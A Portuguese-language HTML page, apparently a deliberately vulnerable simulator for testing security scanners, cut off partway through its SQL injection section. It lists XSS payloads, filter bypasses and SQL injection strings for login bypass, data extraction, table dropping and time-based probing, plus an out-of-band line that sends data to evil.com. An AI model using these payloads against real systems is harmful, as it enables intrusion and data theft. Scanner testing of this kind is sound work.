<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Simulador Completo de Vulnerabilidades Web - XSS e SQL Injection</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            min-height: 100vh;
            color: white;
            padding: 20px;
        }

        .main-container {
            max-width: 1200px;
            margin: 0 auto;
        }

        .container {
            background: rgba(255, 255, 255, 0.1);
            backdrop-filter: blur(10px);
            border-radius: 20px;
            padding: 40px;
            box-shadow: 0 8px 32px rgba(31, 38, 135, 0.37);
            border: 1px solid rgba(255, 255, 255, 0.18);
            margin-bottom: 30px;
        }

        h1 {
            margin-bottom: 30px;
            font-size: 2.5rem;
            text-shadow: 2px 2px 4px rgba(0,0,0,0.3);
            text-align: center;
        }

        h2 {
            color: #ff6b6b;
            margin: 20px 0 15px 0;
            font-size: 1.8rem;
            border-bottom: 2px solid #ff6b6b;
            padding-bottom: 10px;
        }

        h3 {
            color: #ffd93d;
            margin: 15px 0 10px 0;
            font-size: 1.4rem;
        }

        h4 {
            color: #6bcf7f;
            margin: 10px 0 8px 0;
            font-size: 1.2rem;
        }

        .vulnerability-section {
            margin: 20px 0;
            padding: 20px;
            background: rgba(255,255,255,0.05);
            border-radius: 10px;
            border-left: 4px solid #ff6b6b;
        }

        .sql-section {
            border-left: 4px solid #4fc3f7;
        }

        .sql-section h3, .sql-section h4 {
            color: #4fc3f7;
        }

        input, textarea, select {
            padding: 12px;
            border: none;
            border-radius: 8px;
            background: rgba(255,255,255,0.9);
            color: #333;
            font-size: 1rem;
            margin: 5px;
            width: calc(100% - 10px);
            max-width: 400px;
        }

        button {
            background: rgba(255,255,255,0.2);
            border: none;
            color: white;
            padding: 12px 25px;
            margin: 5px;
            border-radius: 25px;
            cursor: pointer;
            font-size: 1rem;
            transition: all 0.3s ease;
            border: 1px solid rgba(255,255,255,0.3);
        }

        button:hover {
            background: rgba(255,255,255,0.3);
            transform: translateY(-2px);
            box-shadow: 0 5px 15px rgba(0,0,0,0.2);
        }

        .result-box {
            background: rgba(0,0,0,0.2);
            border-radius: 8px;
            padding: 15px;
            margin: 10px 0;
            min-height: 50px;
            border: 1px dashed rgba(255,255,255,0.3);
            font-family: 'Courier New', monospace;
        }

        .payload-examples {
            background: rgba(255,255,255,0.05);
            padding: 10px;
            border-radius: 5px;
            margin: 10px 0;
            font-size: 0.9rem;
            font-family: 'Courier New', monospace;
        }

        .warning {
            background: rgba(255,0,0,0.1);
            border: 1px solid #ff6b6b;
            border-radius: 5px;
            padding: 15px;
            margin: 15px 0;
        }

        .clock {
            font-size: 2rem;
            font-weight: bold;
            margin: 20px 0;
            text-shadow: 2px 2px 4px rgba(0,0,0,0.5);
            background: rgba(255,255,255,0.1);
            padding: 20px;
            border-radius: 15px;
            font-family: 'Courier New', monospace;
            text-align: center;
        }

        .grid-container {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(400px, 1fr));
            gap: 20px;
            margin: 20px 0;
        }

        .log-section {
            background: rgba(0,0,0,0.3);
            padding: 20px;
            border-radius: 10px;
            margin: 20px 0;
            max-height: 300px;
            overflow-y: auto;
        }

        .log-entry {
            margin: 5px 0;
            padding: 5px;
            border-radius: 3px;
            font-family: 'Courier New', monospace;
            font-size: 0.9rem;
        }

        .log-xss {
            background: rgba(255,107,107,0.2);
            border-left: 3px solid #ff6b6b;
        }

        .log-sql {
            background: rgba(79,195,247,0.2);
            border-left: 3px solid #4fc3f7;
        }

        .log-info {
            background: rgba(255,217,61,0.2);
            border-left: 3px solid #ffd93d;
        }

        @keyframes pulse {
            0% { transform: scale(1); }
            50% { transform: scale(1.05); }
            100% { transform: scale(1); }
        }

        .pulse {
            animation: pulse 2s infinite;
        }

        @keyframes glow {
            0% { box-shadow: 0 0 5px rgba(255,107,107,0.5); }
            50% { box-shadow: 0 0 20px rgba(255,107,107,0.8); }
            100% { box-shadow: 0 0 5px rgba(255,107,107,0.5); }
        }

        .glow {
            animation: glow 2s infinite;
        }

        .tab-container {
            margin: 20px 0;
        }

        .tab-buttons {
            display: flex;
            flex-wrap: wrap;
            gap: 5px;
            margin-bottom: 20px;
        }

        .tab-button {
            background: rgba(255,255,255,0.1);
            border: 1px solid rgba(255,255,255,0.3);
            color: white;
            padding: 10px 20px;
            border-radius: 20px 20px 0 0;
            cursor: pointer;
            transition: all 0.3s ease;
        }

        .tab-button.active {
            background: rgba(255,255,255,0.3);
            border-bottom: 1px solid transparent;
        }

        .tab-content {
            display: none;
            background: rgba(255,255,255,0.05);
            padding: 20px;
            border-radius: 0 10px 10px 10px;
        }

        .tab-content.active {
            display: block;
        }

        .payload-grid {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(300px, 1fr));
            gap: 15px;
            margin: 15px 0;
        }

        .payload-item {
            background: rgba(255,255,255,0.05);
            padding: 10px;
            border-radius: 5px;
            border: 1px solid rgba(255,255,255,0.1);
        }

        .vulnerability-counter {
            background: rgba(255,107,107,0.2);
            padding: 15px;
            border-radius: 10px;
            text-align: center;
            margin: 20px 0;
        }

        .stats-grid {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
            gap: 15px;
            margin: 20px 0;
        }

        .stat-card {
            background: rgba(255,255,255,0.1);
            padding: 20px;
            border-radius: 10px;
            text-align: center;
        }

        .stat-number {
            font-size: 2rem;
            font-weight: bold;
            margin-bottom: 5px;
        }

        /* Estilos responsivos */
        @media (max-width: 768px) {
            .container {
                padding: 20px;
            }

            h1 {
                font-size: 2rem;
            }

            .grid-container {
                grid-template-columns: 1fr;
            }

            .tab-buttons {
                flex-direction: column;
            }
        }

        /* Estilos para simulação de diferentes vulnerabilidades */
        .csrf-section {
            border-left: 4px solid #9c27b0;
        }

        .csrf-section h3, .csrf-section h4 {
            color: #9c27b0;
        }

        .lfi-section {
            border-left: 4px solid #ff9800;
        }

        .lfi-section h3, .lfi-section h4 {
            color: #ff9800;
        }

        .rce-section {
            border-left: 4px solid #f44336;
        }

        .rce-section h3, .rce-section h4 {
            color: #f44336;
        }

        .xxe-section {
            border-left: 4px solid #607d8b;
        }

        .xxe-section h3, .xxe-section h4 {
            color: #607d8b;
        }

        /* Animações adicionais */
        @keyframes fadeInUp {
            from {
                opacity: 0;
                transform: translateY(30px);
            }
            to {
                opacity: 1;
                transform: translateY(0);
            }
        }

        .fade-in {
            animation: fadeInUp 0.6s ease-out;
        }

        /* Estilos para formulários complexos */
        .form-group {
            margin: 15px 0;
        }

        .form-group label {
            display: block;
            margin-bottom: 5px;
            font-weight: bold;
        }

        .form-row {
            display: flex;
            gap: 10px;
            flex-wrap: wrap;
        }

        .form-row input {
            flex: 1;
            min-width: 200px;
        }
    </style>
</head>
<body>
<div class="main-container">
    <div class="container">
        <h1 class="pulse">🚀 Simulador Completo de Vulnerabilidades Web</h1>

        <!-- Relógio e Estatísticas -->
        <div class="clock" id="clock"></div>

        <div class="stats-grid">
            <div class="stat-card">
                <div class="stat-number" id="xssCount">0</div>
                <div>Tentativas XSS</div>
            </div>
            <div class="stat-card">
                <div class="stat-number" id="sqlCount">0</div>
                <div>Tentativas SQL Injection</div>
            </div>
            <div class="stat-card">
                <div class="stat-number" id="totalVulns">0</div>
                <div>Total de Vulnerabilidades</div>
            </div>
            <div class="stat-card">
                <div class="stat-number" id="payloadCount">0</div>
                <div>Payloads Testados</div>
            </div>
        </div>
    </div>

    <!-- Seção de XSS Expandida -->
    <div class="container">
        <h2>🔥 Simulações de Cross-Site Scripting (XSS)</h2>

        <div class="warning">
            <strong>⚠️ AVISO:</strong> Esta página contém simulações de vulnerabilidades para fins de teste de scanners de segurança.
            NÃO use em produção!
        </div>

        <div class="tab-container">
            <div class="tab-buttons">
                <button class="tab-button active" onclick="showTab('xss-reflected')">XSS Refletido</button>
                <button class="tab-button" onclick="showTab('xss-stored')">XSS Armazenado</button>
                <button class="tab-button" onclick="showTab('xss-dom')">XSS DOM-Based</button>
                <button class="tab-button" onclick="showTab('xss-attributes')">XSS em Atributos</button>
                <button class="tab-button" onclick="showTab('xss-advanced')">XSS Avançado</button>
            </div>

            <!-- XSS Refletido -->
            <div id="xss-reflected" class="tab-content active">
                <h3>XSS Refletido - Múltiplas Variações</h3>

                <div class="vulnerability-section">
                    <h4>1. Busca Simples (Sem Filtros)</h4>
                    <input type="text" id="search1" placeholder="Pesquisar..." onkeyup="reflectedXSS1()">
                    <div class="result-box" id="result1"></div>

                    <div class="payload-examples">
                        Teste com: &lt;script&gt;alert('XSS1')&lt;/script&gt; ou &lt;img src=x onerror=alert('XSS1')&gt;
                    </div>
                </div>

                <div class="vulnerability-section">
                    <h4>2. Busca com innerHTML</h4>
                    <input type="text" id="search2" placeholder="Busca avançada..." onkeyup="reflectedXSS2()">
                    <div class="result-box" id="result2"></div>

                    <div class="payload-examples">
                        Teste com: &lt;svg onload=alert('XSS2')&gt; ou &lt;body onload=alert('XSS2')&gt;
                    </div>
                </div>

                <div class="vulnerability-section">
                    <h4>3. Busca com Parâmetros GET Simulados</h4>
                    <input type="text" id="search3" placeholder="Query string..." onkeyup="reflectedXSS3()">
                    <div class="result-box" id="result3"></div>

                    <div class="payload-examples">
                        Teste com: javascript:alert('XSS3') ou &lt;iframe src="javascript:alert('XSS3')"&gt;
                    </div>
                </div>

                <div class="vulnerability-section">
                    <h4>4. Busca em Headers Simulados</h4>
                    <input type="text" id="search4" placeholder="User Agent..." onkeyup="reflectedXSS4()">
                    <div class="result-box" id="result4"></div>

                    <div class="payload-examples">
                        Teste com: &lt;details open ontoggle=alert('XSS4')&gt; ou &lt;marquee onstart=alert('XSS4')&gt;
                    </div>
                </div>

                <div class="vulnerability-section">
                    <h4>5. Múltiplos Contextos</h4>
                    <div class="form-row">
                        <input type="text" id="search5a" placeholder="Nome..." onkeyup="reflectedXSS5()">
                        <input type="text" id="search5b" placeholder="Email..." onkeyup="reflectedXSS5()">
                        <input type="text" id="search5c" placeholder="Comentário..." onkeyup="reflectedXSS5()">
                    </div>
                    <div class="result-box" id="result5"></div>
                </div>
            </div>

            <!-- XSS Armazenado -->
            <div id="xss-stored" class="tab-content">
                <h3>XSS Armazenado - Persistente</h3>

                <div class="vulnerability-section">
                    <h4>1. Sistema de Comentários</h4>
                    <textarea id="comment1" placeholder="Deixe seu comentário..." rows="3"></textarea>
                    <br>
                    <input type="text" id="author1" placeholder="Seu nome...">
                    <button onclick="addStoredComment('comments1', 'comment1', 'author1')">💬 Comentar</button>
                    <div class="result-box" id="comments1"></div>
                </div>

                <div class="vulnerability-section">
                    <h4>2. Guestbook / Livro de Visitas</h4>
                    <textarea id="guestbook" placeholder="Assine nosso livro de visitas..." rows="4"></textarea>
                    <br>
                    <input type="text" id="guestName" placeholder="Nome completo...">
                    <input type="text" id="guestEmail" placeholder="Email...">
                    <button onclick="addGuestbookEntry()">✍️ Assinar</button>
                    <div class="result-box" id="guestbookEntries"></div>
                </div>

                <div class="vulnerability-section">
                    <h4>3. Sistema de Reviews/Avaliações</h4>
                    <select id="rating">
                        <option value="1">⭐ 1 Estrela</option>
                        <option value="2">⭐⭐ 2 Estrelas</option>
                        <option value="3">⭐⭐⭐ 3 Estrelas</option>
                        <option value="4">⭐⭐⭐⭐ 4 Estrelas</option>
                        <option value="5">⭐⭐⭐⭐⭐ 5 Estrelas</option>
                    </select>
                    <textarea id="review" placeholder="Escreva sua avaliação..." rows="3"></textarea>
                    <button onclick="addReview()">📝 Avaliar</button>
                    <div class="result-box" id="reviews"></div>
                </div>

                <div class="vulnerability-section">
                    <h4>4. Fórum de Discussão</h4>
                    <input type="text" id="forumTitle" placeholder="Título do tópico...">
                    <textarea id="forumContent" placeholder="Conteúdo da mensagem..." rows="4"></textarea>
                    <input type="text" id="forumAuthor" placeholder="Autor...">
                    <button onclick="addForumPost()">🗨️ Postar</button>
                    <div class="result-box" id="forumPosts"></div>
                </div>

                <div class="vulnerability-section">
                    <h4>5. Sistema de Notícias/Blog</h4>
                    <input type="text" id="newsTitle" placeholder="Título da notícia...">
                    <textarea id="newsContent" placeholder="Conteúdo da notícia..." rows="5"></textarea>
                    <input type="text" id="newsAuthor" placeholder="Jornalista...">
                    <input type="text" id="newsCategory" placeholder="Categoria...">
                    <button onclick="addNewsArticle()">📰 Publicar</button>
                    <div class="result-box" id="newsArticles"></div>
                </div>
            </div>

            <!-- XSS DOM-Based -->
            <div id="xss-dom" class="tab-content">
                <h3>XSS DOM-Based - Client-Side</h3>

                <div class="vulnerability-section">
                    <h4>1. Manipulação de URL Hash</h4>
                    <input type="text" id="hashInput" placeholder="Valor do hash..." onkeyup="updateHash()">
                    <div class="result-box" id="hashResult"></div>
                    <button onclick="readHashValue()">🔗 Ler Hash da URL</button>
                </div>

                <div class="vulnerability-section">
                    <h4>2. document.write() Vulnerável</h4>
                    <input type="text" id="writeInput" placeholder="Conteúdo para escrever..." onkeyup="vulnerableWrite()">
                    <div class="result-box" id="writeResult"></div>
                </div>

                <div class="vulnerability-section">
                    <h4>3. eval() com Input do Usuário</h4>
                    <input type="text" id="evalInput" placeholder="Código JavaScript..." onkeyup="vulnerableEval()">
                    <div class="result-box" id="evalResult"></div>
                    <div class="payload-examples">
                        Teste com: alert('XSS via eval') ou console.log('DOM XSS')
                    </div>
                </div>

                <div class="vulnerability-section">
                    <h4>4. setTimeout() Dinâmico</h4>
                    <input type="text" id="timeoutInput" placeholder="Código para setTimeout...">
                    <button onclick="vulnerableTimeout()">⏰ Executar</button>
                    <div class="result-box" id="timeoutResult"></div>
                </div>

                <div class="vulnerability-section">
                    <h4>5. Manipulação de Propriedades do DOM</h4>
                    <input type="text" id="domInput" placeholder="Valor da propriedade...">
                    <select id="domProperty">
                        <option value="innerHTML">innerHTML</option>
                        <option value="outerHTML">outerHTML</option>
                        <option value="textContent">textContent</option>
                        <option value="innerText">innerText</option>
                    </select>
                    <button onclick="manipulateDOM()">🔧 Aplicar</button>
                    <div class="result-box" id="domResult"></div>
                </div>
            </div>

            <!-- XSS em Atributos -->
            <div id="xss-attributes" class="tab-content">
                <h3>XSS em Atributos HTML</h3>

                <div class="vulnerability-section">
                    <h4>1. Atributo src de Imagem</h4>
                    <input type="text" id="imgSrc" placeholder="URL da imagem..." onkeyup="updateImageSrc()">
                    <br><br>
                    <img id="dynamicImg" src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg'%3E%3C/svg%3E"
                         alt="Imagem dinâmica" style="max-width: 200px; border: 1px solid #ccc;">

                    <div class="payload-examples">
                        Teste com: javascript:alert('XSS') ou x" onerror="alert('XSS')
                    </div>
                </div>

                <div class="vulnerability-section">
                    <h4>2. Atributo href de Link</h4>
                    <input type="text" id="linkHref" placeholder="URL do link..." onkeyup="updateLinkHref()">
                    <br><br>
                    <a id="dynamicLink" href="#" target="_blank">🔗 Link Dinâmico</a>
                </div>

                <div class="vulnerability-section">
                    <h4>3. Atributos de Formulário</h4>
                    <input type="text" id="formAction" placeholder="Action do formulário..." onkeyup="updateFormAction()">
                    <input type="text" id="formMethod" placeholder="Method..." onkeyup="updateFormMethod()">
                    <br><br>
                    <form id="dynamicForm">
                        <input type="text" placeholder="Campo de teste">
                        <button type="submit">📨 Enviar</button>
                    </form>
                </div>

                <div class="vulnerability-section">
                    <h4>4. Atributos de Estilo CSS</h4>
                    <input type="text" id="styleInput" placeholder="Propriedades CSS..." onkeyup="updateStyle()">
                    <div id="styledElement" style="padding: 20px; border: 1px solid #ccc; margin: 10px 0;">
                        Elemento com estilo dinâmico
                    </div>

                    <div class="payload-examples">
                        Teste com: expression(alert('XSS')) ou "; background: url('javascript:alert(\"XSS\")')
                    </div>
                </div>

                <div class="vulnerability-section">
                    <h4>5. Múltiplos Atributos</h4>
                    <input type="text" id="attrTitle" placeholder="Título..." onkeyup="updateMultipleAttrs()">
                    <input type="text" id="attrAlt" placeholder="Alt text..." onkeyup="updateMultipleAttrs()">
                    <input type="text" id="attrClass" placeholder="Classes CSS..." onkeyup="updateMultipleAttrs()">
                    <br><br>
                    <div id="multiAttrElement" style="padding: 15px; border: 2px dashed #ccc;">
                        Elemento com múltiplos atributos dinâmicos
                    </div>
                </div>
            </div>

            <!-- XSS Avançado -->
            <div id="xss-advanced" class="tab-content">
                <h3>XSS Avançado - Técnicas Complexas</h3>

                <div class="vulnerability-section">
                    <h4>1. Bypass de Filtros Básicos</h4>
                    <input type="text" id="bypassInput" placeholder="Payload com bypass..." onkeyup="testBypass()">
                    <div class="result-box" id="bypassResult"></div>

                    <div class="payload-examples">
                        Teste com: &lt;ScRiPt&gt;alert('XSS')&lt;/ScRiPt&gt; ou &lt;img/src=x/onerror=alert('XSS')&gt;
                    </div>
                </div>

                <div class="vulnerability-section">
                    <h4>2. Encoding e Obfuscação</h4>
                    <input type="text" id="encodedInput" placeholder="Payload codificado..." onkeyup="testEncoded()">
                    <div class="result-box" id="encodedResult"></div>

                    <div class="payload-examples">
                        Teste com: %3Cscript%3Ealert('XSS')%3C/script%3E ou &#x3C;script&#x3E;alert('XSS')&#x3C;/script&#x3E;
                    </div>
                </div>

                <div class="vulnerability-section">
                    <h4>3. Event Handlers Alternativos</h4>
                    <input type="text" id="eventInput" placeholder="Event handler..." onkeyup="testEventHandlers()">
                    <div class="result-box" id="eventResult"></div>

                    <div class="payload-examples">
                        Teste com: &lt;div onmouseover=alert('XSS')&gt; ou &lt;input onfocus=alert('XSS') autofocus&gt;
                    </div>
                </div>

                <div class="vulnerability-section">
                    <h4>4. Polyglots XSS</h4>
                    <input type="text" id="polyglotInput" placeholder="Polyglot payload..." onkeyup="testPolyglot()">
                    <div class="result-box" id="polyglotResult"></div>

                    <div class="payload-examples">
                        Teste com: '"&gt;&lt;svg/onload=alert('XSS')&gt; ou javascript:/*--&gt;&lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/script&gt;&lt;/xmp&gt;&lt;svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert('XSS')//&gt;
                    </div>
                </div>

                <div class="vulnerability-section">
                    <h4>5. WAF Bypassing</h4>
                    <input type="text" id="wafBypassInput" placeholder="Bypass WAF..." onkeyup="testWAFBypass()">
                    <div class="result-box" id="wafBypassResult"></div>

                    <div class="payload-examples">
                        Teste com: &lt;img src=1 onerror=alert`XSS`&gt; ou &lt;svg&gt;&lt;animatetransform onbegin=alert('XSS')&gt;
                    </div>
                </div>
            </div>
        </div>
    </div>

    <!-- Seção de SQL Injection -->
    <div class="container">
        <h2>💉 Simulações de SQL Injection</h2>

        <div class="tab-container">
            <div class="tab-buttons">
                <button class="tab-button active" onclick="showTab('sql-basic')">SQL Básico</button>
                <button class="tab-button" onclick="showTab('sql-union')">UNION Attacks</button>
                <button class="tab-button" onclick="showTab('sql-blind')">Blind SQL</button>
                <button class="tab-button" onclick="showTab('sql-time')">Time-Based</button>
                <button class="tab-button" onclick="showTab('sql-advanced')">SQL Avançado</button>
            </div>

            <!-- SQL Básico -->
            <div id="sql-basic" class="tab-content active">
                <h3>SQL Injection Básico</h3>

                <div class="vulnerability-section sql-section">
                    <h4>1. Login Bypass</h4>
                    <input type="text" id="sqlUser" placeholder="Usuário..." onkeyup="simulateLogin()">
                    <input type="password" id="sqlPass" placeholder="Senha..." onkeyup="simulateLogin()">
                    <button onclick="simulateLogin()">🔐 Login</button>
                    <div class="result-box" id="loginResult"></div>

                    <div class="payload-examples">
                        Teste com: admin' OR '1'='1' -- ou admin'/**/OR/**/1=1#
                    </div>

                    <div class="payload-examples">
                        Query simulada: SELECT * FROM users WHERE username='%s' AND password='%s'
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>2. Busca de Produtos</h4>
                    <input type="text" id="productSearch" placeholder="Buscar produto..." onkeyup="searchProduct()">
                    <div class="result-box" id="productResult"></div>

                    <div class="payload-examples">
                        Teste com: ' UNION SELECT version() -- ou 1' OR 1=1 --
                    </div>

                    <div class="payload-examples">
                        Query simulada: SELECT name, price FROM products WHERE name LIKE '%s'
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>3. Busca por ID</h4>
                    <input type="text" id="idSearch" placeholder="ID do registro..." onkeyup="searchById()">
                    <div class="result-box" id="idResult"></div>

                    <div class="payload-examples">
                        Teste com: 1 OR 1=1 ou 1; DROP TABLE users; --
                    </div>

                    <div class="payload-examples">
                        Query simulada: SELECT * FROM records WHERE id = %s
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>4. Filtro de Categoria</h4>
                    <select id="categoryFilter" onchange="filterByCategory()">
                        <option value="">Selecione uma categoria</option>
                        <option value="electronics">Eletrônicos</option>
                        <option value="books">Livros</option>
                        <option value="clothing">Roupas</option>
                    </select>
                    <input type="text" id="customCategory" placeholder="Categoria personalizada..." onkeyup="filterByCategory()">
                    <div class="result-box" id="categoryResult"></div>

                    <div class="payload-examples">
                        Query simulada: SELECT * FROM products WHERE category = '%s'
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>5. Ordenação Dinâmica</h4>
                    <input type="text" id="orderBy" placeholder="Campo para ordenar..." onkeyup="dynamicOrder()">
                    <select id="orderDirection" onchange="dynamicOrder()">
                        <option value="ASC">Crescente</option>
                        <option value="DESC">Decrescente</option>
                    </select>
                    <div class="result-box" id="orderResult"></div>

                    <div class="payload-examples">
                        Teste com: id; SELECT * FROM admin_users -- ou (SELECT * FROM users)
                    </div>

                    <div class="payload-examples">
                        Query simulada: SELECT * FROM products ORDER BY %s %s
                    </div>
                </div>
            </div>

            <!-- UNION Attacks -->
            <div id="sql-union" class="tab-content">
                <h3>UNION-Based SQL Injection</h3>

                <div class="vulnerability-section sql-section">
                    <h4>1. Detecção de Colunas</h4>
                    <input type="text" id="unionCols" placeholder="Teste UNION..." onkeyup="testUnionColumns()">
                    <div class="result-box" id="unionColsResult"></div>

                    <div class="payload-examples">
                        Teste com: ' UNION SELECT NULL -- ou ' UNION SELECT NULL,NULL,NULL --
                    </div>

                    <div class="payload-examples">
                        Query simulada: SELECT name, price, description FROM products WHERE id = '%s'
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>2. Extração de Dados</h4>
                    <input type="text" id="unionData" placeholder="UNION para extrair dados..." onkeyup="extractData()">
                    <div class="result-box" id="unionDataResult"></div>

                    <div class="payload-examples">
                        Teste com: ' UNION SELECT username,password,email FROM users -- ou ' UNION SELECT version(),user(),database() --
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>3. Listagem de Tabelas</h4>
                    <input type="text" id="unionTables" placeholder="Listar tabelas..." onkeyup="listTables()">
                    <div class="result-box" id="unionTablesResult"></div>

                    <div class="payload-examples">
                        Teste com: ' UNION SELECT table_name,NULL,NULL FROM information_schema.tables --
                    </div>

                    <div class="payload-examples">
                        Query simulada: SELECT * FROM articles WHERE title LIKE '%s'
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>4. Listagem de Colunas</h4>
                    <input type="text" id="unionColumns" placeholder="Listar colunas..." onkeyup="listColumns()">
                    <div class="result-box" id="unionColumnsResult"></div>

                    <div class="payload-examples">
                        Teste com: ' UNION SELECT column_name,table_name,NULL FROM information_schema.columns WHERE table_name='users' --
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>5. Bypass de Filtros</h4>
                    <input type="text" id="unionBypass" placeholder="UNION com bypass..." onkeyup="unionBypass()">
                    <div class="result-box" id="unionBypassResult"></div>

                    <div class="payload-examples">
                        Teste com: ' UNION/**/SELECT/**/password/**/FROM/**/users -- ou ' /*!UNION*/ /*!SELECT*/ password /*!FROM*/ users --
                    </div>
                </div>
            </div>

            <!-- Blind SQL -->
            <div id="sql-blind" class="tab-content">
                <h3>Blind SQL Injection</h3>

                <div class="vulnerability-section sql-section">
                    <h4>1. Boolean-Based Blind</h4>
                    <input type="text" id="booleanBlind" placeholder="Teste boolean..." onkeyup="testBooleanBlind()">
                    <div class="result-box" id="booleanResult"></div>

                    <div class="payload-examples">
                        Teste com: 1' AND (SELECT SUBSTRING(username,1,1) FROM users WHERE id=1)='a' -- ou 1' AND 1=1 --
                    </div>

                    <div class="payload-examples">
                        Query simulada: SELECT * FROM users WHERE id = '%s' AND active = 1
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>2. Error-Based Blind</h4>
                    <input type="text" id="errorBlind" placeholder="Erro forçado..." onkeyup="testErrorBlind()">
                    <div class="result-box" id="errorResult"></div>

                    <div class="payload-examples">
                        Teste com: 1' AND (SELECT COUNT(*) FROM users)=1 -- ou 1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e)) --
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>3. Extração Character by Character</h4>
                    <input type="text" id="charExtract" placeholder="Extração por caractere..." onkeyup="extractCharByChar()">
                    <div class="result-box" id="charResult"></div>

                    <div class="payload-examples">
                        Teste com: 1' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))=97 --
                    </div>

                    <div class="payload-examples">
                        Query simulada: SELECT id FROM products WHERE category = '%s'
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>4. Blind com Subconsultas</h4>
                    <input type="text" id="blindSubquery" placeholder="Subconsulta blind..." onkeyup="testBlindSubquery()">
                    <div class="result-box" id="subqueryResult"></div>

                    <div class="payload-examples">
                        Teste com: 1' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())>5 --
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>5. Blind com Regex</h4>
                    <input type="text" id="blindRegex" placeholder="Teste regex..." onkeyup="testBlindRegex()">
                    <div class="result-box" id="regexResult"></div>

                    <div class="payload-examples">
                        Teste com: 1' AND (SELECT username FROM users WHERE id=1) REGEXP '^a' --
                    </div>
                </div>
            </div>

            <!-- Time-Based -->
            <div id="sql-time" class="tab-content">
                <h3>Time-Based SQL Injection</h3>

                <div class="vulnerability-section sql-section">
                    <h4>1. SLEEP() Básico</h4>
                    <input type="text" id="timeSleep" placeholder="Teste SLEEP..." onkeyup="testSleep()">
                    <div class="result-box" id="sleepResult"></div>

                    <div class="payload-examples">
                        Teste com: 1' AND SLEEP(5) -- ou 1'; WAITFOR DELAY '00:00:05' --
                    </div>

                    <div class="payload-examples">
                        Query simulada: SELECT * FROM users WHERE username = '%s'
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>2. IF() com SLEEP()</h4>
                    <input type="text" id="timeIf" placeholder="IF com SLEEP..." onkeyup="testIfSleep()">
                    <div class="result-box" id="ifSleepResult"></div>

                    <div class="payload-examples">
                        Teste com: 1' AND IF((SELECT COUNT(*) FROM users)=1,SLEEP(5),0) -- ou 1' AND IF(1=1,SLEEP(3),0) --
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>3. Benchmark() Attack</h4>
                    <input type="text" id="timeBenchmark" placeholder="BENCHMARK..." onkeyup="testBenchmark()">
                    <div class="result-box" id="benchmarkResult"></div>

                    <div class="payload-examples">
                        Teste com: 1' AND BENCHMARK(5000000,MD5(1)) -- ou 1' AND (SELECT BENCHMARK(5000000,MD5(1))) --
                    </div>

                    <div class="payload-examples">
                        Query simulada: SELECT id, name FROM products WHERE id = %s
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>4. Heavy Query</h4>
                    <input type="text" id="timeHeavy" placeholder="Query pesada..." onkeyup="testHeavyQuery()">
                    <div class="result-box" id="heavyResult"></div>

                    <div class="payload-examples">
                        Teste com: 1' AND (SELECT COUNT(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C) --
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>5. Time-Based com Condicionais</h4>
                    <input type="text" id="timeConditional" placeholder="Condicional temporal..." onkeyup="testConditionalTime()">
                    <div class="result-box" id="conditionalTimeResult"></div>

                    <div class="payload-examples">
                        Teste com: 1' AND IF((SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a',SLEEP(5),0) --
                    </div>

                    <div class="payload-examples">
                        Query simulada: SELECT * FROM articles WHERE category = '%s' ORDER BY id
                    </div>
                </div>
            </div>

            <!-- SQL Avançado -->
            <div id="sql-advanced" class="tab-content">
                <h3>SQL Injection Avançado</h3>

                <div class="vulnerability-section sql-section">
                    <h4>1. Second-Order SQL Injection</h4>
                    <input type="text" id="secondOrder1" placeholder="Primeiro payload..." onkeyup="storeSecondOrder()">
                    <button onclick="triggerSecondOrder()">🔄 Triggerar Segunda Ordem</button>
                    <div class="result-box" id="secondOrderResult"></div>

                    <div class="payload-examples">
                        Teste com: admin'+(SELECT GROUP_CONCAT(username) FROM users WHERE '1'='1
                    </div>

                    <div class="payload-examples">
                        Query 1: INSERT INTO temp_data (data) VALUES ('%s')<br>
                        Query 2: SELECT * FROM users WHERE username = (SELECT data FROM temp_data WHERE id = %s)
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>2. Out-of-Band SQL Injection</h4>
                    <input type="text" id="outOfBand" placeholder="OOB payload..." onkeyup="testOutOfBand()">
                    <div class="result-box" id="oobResult"></div>

                    <div class="payload-examples">
                        Teste com: 1' AND (SELECT LOAD_FILE(CONCAT('\\\\',version(),'.evil.com\\test'))) --
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>3. SQL Injection em Procedures</h4>
                    <input type="text" id="procedureParam" placeholder="Parâmetro da procedure..." onkeyup="testProcedure()">
                    <div class="result-box" id="procedureResult"></div>

                    <div class="payload-examples">
